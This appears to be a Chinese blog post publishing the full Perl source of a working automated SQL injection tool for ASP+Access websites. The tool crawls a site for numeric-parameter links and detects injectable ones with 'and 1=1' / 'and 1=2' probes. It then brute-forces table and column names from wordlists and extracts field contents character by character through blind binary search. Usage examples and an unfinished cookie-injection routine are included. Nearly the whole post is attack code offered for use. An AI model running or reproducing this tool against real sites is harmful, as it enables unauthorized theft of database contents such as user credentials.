基于Perl的asp+access扫描注入工具,cookie扫描注入还未完成
-
#!usr/bin/perl
-
-
use strict;
-
use LWP::UserAgent;
-
use HTML::LinkExtor;
-
use URI::URL;
-
use URI::Escape;
-
use 5.010001;
-
#use HTTP::Cookies;
-
$|=1;
-
-
#############################################
-
my $ua=LWP::UserAgent->new(
-
'User-Agent'=>'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iCafeMedia; .NET CLR 2.0.50727; CIBA)',
-
'time_out'=>'3');
-
my %link;
-
my @link;
-
my $res;
-
my @inject_url;
-
#############################################
-
my $table_fl="tables.txt";
-
my $line_fl="lines.txt";
-
my($high,$low)=(127,31);
-
#############################################
-
-
print qq!\n
-
===============================================================================
-
SQL INJECT
-
by LLC
-
2013.5.2
-
===============================================================================
-
-
!;
-
&Cmd_Anlz(@ARGV);
-
&SQL_Inject(@inject_url); #注入
-
-
# 命令解析
-
sub Cmd_Anlz{
-
my @input_url;
-
while(defined(my $cmd=shift @_)){
-
given($cmd){
-
when(!/^-/){&Progress($cmd)}
-
when(/(^-u)|(^--url)/){ open URL,'<',shift @_ or die "ERROR\n";
-
foreach(<URL>){chomp $_;
-
push @input_url,$_};
-
&Progress(@input_url)}
-
when(/(^-t)|(^--table)/){$table_fl=shift @_}
-
when(/(^-l)|(^--line)/){$line_fl=shift @_}
-
when(/(^-i)|(^--inject)/){push(@inject_url,&Http_add(shift @_))}
-
when(/(^-h)|(^--help)/){&Help_line}
-
default{die "ERROR COMMAND!\n"}
-
}
-
}
-
}
-
-
sub Progress{
-
my @tmp=@_;
-
map{$link{$_}=1} @tmp; #把url自身加入扫描列表
-
my $base;
-
my $p;
-
while(defined(my $input_url=shift @tmp)){
-
$input_url=&Http_add($input_url);
-
$p=HTML::LinkExtor->new(\&callback);
-
# Request document and parse it as it arrives
-
$res=$ua->request(HTTP::Request->new(GET=>$input_url),sub {$p->parse($_[0])});
-
$base=$res->base;
-
}
-
@link=keys %link;
-
undef %link;
-
@link=map { $_ =url($_, $base)->abs; } @link;
-
@link=&Link_Anlz(@link);
-
#print join("\n",@link);
-
&Inject_get(@link); #扫描注入点
-
}
-
-
sub Http_add{
-
my $url=shift;
-
$url=~s!(http://)?(.*)!http://$2!i;
-
return $url;
-
}
-
-
sub callback {
-
my($tag, %attr) = @_;
-
return if ($tag ne 'a' and $tag ne 'link');
-
grep{++$link{$_}<2}values %attr;
-
-
}
-
-
sub Link_Anlz{
-
my @url;
-
while(defined (my $tmp=shift @_)){
-
push(@url,$tmp) if $tmp=~m/\.asp\?.*?=\d+((\s+)|((%20)+))?$/;
-
}
-
#print join("\n",@url);
-
return @url;
-
}
-
-
sub Inject_get{
-
my %url=();
-
while(defined(my $tmp=shift @_)){
-
$url{0}=$tmp;
-
$url{1}=$tmp.uri_escape(" and 1=1");
-
$url{2}=$tmp.uri_escape(" and 1=2");
-
for(my $i=0;$i<3;$i++){
-
$url{$i}=$ua->get($url{$i});
-
}
-
if($url{0}->content eq $url{1}->content and $url{1}->content ne $url{2}->content){
-
print "GET注入点: \t$tmp\n";
-
push @inject_url,$tmp;
-
}else{
-
print "找不到注入点\n";
-
}
-
}
-
}
-
-
sub SQL_Inject{
-
return 0 unless(defined $inject_url[0]);
-
my @url=@_;
-
my @table;
-
my @line;
-
my @lenth;
-
my $success_url;
-
open TABLE,'<',"$table_fl" or die "can't open $table_fl\n";
-
print "\n猜表名 ing... \twait\n";
-
while(defined (my $url=shift @url)){
-
$res=$ua->get($url);
-
last if defined($table[0]);
-
while(defined (my $rd_line=<TABLE>)){
-
chomp $rd_line;
-
my $tmp=$ua->get($url.uri_escape(" and exists (select * from $rd_line)"));
-
#print $url.uri_escape(" and exists (select * from $rd_line)")."\n";
-
if($tmp->status_line=~/20/ and $tmp->content eq $res->content){
-
push @table,$rd_line;
-
print "TABLE NAME:\t$rd_line\n";
-
$success_url=$url;
-
}
-
}
-
}
-
-
unless(defined $table[0]){
-
print "猜表失败,请尝试其他表字典\n";
-
return 0;
-
}
-
-
################### 列名 #####################
-
print "\n猜列名==>\t请输入表名:(表名间以\",\"分割)\nTABLE NAME:\t";
-
my $in_table=<stdin>;
-
chomp $in_table;
-
@table=split(/,/,$in_table);
-
open LINE,'<',"$line_fl" or die "can't open $line_fl\n";
-
$res=$ua->get($success_url);
-
print "\n表名==> \t列名\n";
-
-
foreach my $table(@table){
-
while(defined (my $rd_line=<LINE>)){
-
chomp $rd_line;
-
my $tmp=$ua->get($success_url.uri_escape(" and exists (select $rd_line from $table)"));
-
#print $success_url." and exists (select $rd_line from $table)"."\n";
-
if($tmp->status_line=~/20/ and $tmp->content eq $res->content){
-
push @line,$rd_line;
-
print "$table==>\t$rd_line\n";
-
}
-
}
-
}
-
-
unless(defined $line[0]){
-
print "猜列失败,请尝试其他表字典\n";
-
return 0;
-
}
-
-
#####################列的长度#####################
-
print "\n猜列长==>\t请输入表名:列名:(多个列名间以\",\"分割)\n";
-
my $lines=<stdin>;
-
chomp $lines;
-
my $table;
-
($table,$lines)=split(":",$lines);
-
@line=split(",",$lines);
-
-
foreach my $line(@line){
-
my $i=0;
-
my $tmp;
-
do{ $i++;
-
$tmp=$ua->get($success_url.uri_escape(" and (select top 1 len($line) from $table)>$i"));
-
} while($tmp->content eq $res->content);
-
print "$table==>$line:\t$i\n";
-
push @lenth,$i;
-
}
-
-
########################字段的值###################
-
print "\n猜解字段的值\n";
-
for(my $i=0;scalar @line>$i;$i++){
-
my $line=$line[$i];
-
my $lenth=$lenth[$i];
-
my @asc_value;
-
my $tmp;
-
print "\n$table=>$line:";
-
for(my $j=1;$lenth+1>$j;$j++){
-
my $mid=79;
-
$high=127;
-
$low=32;
-
-
while($high!=$low+1){
-
$tmp=$ua->get($success_url.uri_escape(" and (select top 1 asc(mid($line,$j,1)) from $table)>$mid"));
-
if($tmp->content ne $res->content){
-
$mid=&Half(0,$mid);
-
}else{
-
$mid=&Half(1,$mid);
-
}
-
}
-
push @asc_value,$high;
-
print "$high--";
-
}
-
print "\nRESULT:\t".join("",(map{chr($_)}@asc_value));
-
}
-
print qq~\n
-
++++++++++++++++++++++++++++++++++++++ END ++++++++++++++++++++++++++++++++++++
-
~;
-
}
-
sub Half{
-
my ($ruselt,$value)=@_;
-
if($ruselt==1){
-
$low=$value;
-
return int(($high+$low)/2);
-
}else{
-
$high=$value;
-
return int(($high+$low)/2);
-
}
-
}
-
-
sub Help_line{
-
print q~
-
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
帮助信息
-
-
(1) -t 或 --table 加文件名 ==> 数据库的表字典,默认为tables.txt
-
(2) -i 或 --line 加文件名 ==> 数据库的列字典,默认为lines.txt
-
(3) -u 或 --url 加文件名 ==> 读取url字典,请求字典中的url
-
对返回页面中的链接扫描注入点,发现后自动注入。
-
如果不加 "-参数",则只对输入的url进行上述操作。
-
-
(4) -i 或 --inject 加注入点url==>直接对该注入点进行注入
-
(5) -h 或 --help 查看此条帮助信息
-
-
EXP: ***.pl www.xxx.com/news.asp?
-
***.pl -i www.xxx.com:8080/news.asp?id=13 --table form.txt
-
-
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
NAME:SQL Inject Version:1.0 By:LLC E_mail:183229003@qq.com
-
________________________________________________________________________________
-
~
-
}
-
-
=cookie
-
sub Inject_cookie{
-
my %cookie=();
-
my $tmp=shift;
-
my $cookie_jar=HTTP::Cookies->new(file=>'tmp.dat',autosave=>1,);
-
#while(defined(my $tmp=shift @_)){
-
$ua->cookie_jar($cookie_jar);
-
$res=$ua->get($tmp);
-
$tmp=~m!(.*asp\?)((.*?)=(\d+))$!;
-
my $url_base=$1;
-
my $url_id=$3;
-
my $url_num=$4;
-
$cookie{0}=HTTP::Cookies->new(file=>'tmp.txt',autosave=>1,$3=>$4);
-
print "\n $1\t$3\t$4\n";
-
$cookie{1}=uri_escape("$url_id and 1=1");
-
$cookie{2}=uri_escape("$url_id and 1=2");
-
#$ua->cookie_jar($cookie{0});
-
#$cookie{0}=$ua->get($url_base);
-
#print $cookie{0}->content;
-
#print "cookie\n" if ($res->content eq $cookie{0}->content)
-
}
-
=cut
阅读(1234) | 评论(0) | 转发(0) |
